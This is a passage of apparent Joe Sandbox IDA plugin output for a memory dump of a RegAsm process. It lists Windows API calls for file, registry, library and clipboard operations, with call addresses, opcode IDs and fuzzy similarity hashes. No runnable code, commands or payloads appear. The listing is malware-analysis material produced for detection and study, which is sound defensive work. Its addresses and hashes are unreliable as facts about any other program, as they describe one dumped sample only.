                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4232544981-0
                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                          APIs
                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileModuleName
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 514040917-0
                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                          APIs
                                                                                                                          • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3934441357-0
                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                          APIs
                                                                                                                          • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: EnumNamesResource
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3334572018-0
                                                                                                                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                          APIs
                                                                                                                          • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseFind
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1863332320-0
                                                                                                                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 71445658-0
                                                                                                                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                          APIs
                                                                                                                          • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3188754299-0
                                                                                                                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                                                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004095FC
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                            • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3655998216-0
                                                                                                                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 00445426
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1828521557-0
                                                                                                                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                            • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@FilePointermemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 609303285-0
                                                                                                                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2081463915-0
                                                                                                                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2136311172-0
                                                                                                                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1936579350-0
                                                                                                                          • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                          • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1294909896-0
                                                                                                                          • Opcode ID: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                                                                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                          • Opcode Fuzzy Hash: 003685cf356b02fbbab95fb8d76c74631070c0c773c27bafbcebbee0aa56b295
                                                                                                                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1294909896-0
                                                                                                                          • Opcode ID: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                                                                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                          • Opcode Fuzzy Hash: 196381b9ffc9c4816d42631a332da68c1e878a4277d624e181b366dd14fec77a
                                                                                                                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1294909896-0
                                                                                                                          • Opcode ID: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                                                                          • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                                                          • Opcode Fuzzy Hash: 6cd4ef4cc40bf5a7540e7e9c88dd58f61d837874a50d1d7f714cafdae955675f
                                                                                                                          • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                                                          APIs
                                                                                                                          • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                          • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                          • GetLastError.KERNEL32 ref: 00409974
                                                                                                                          • CloseClipboard.USER32 ref: 0040997D
                                                                                                                          Memory Dump Source
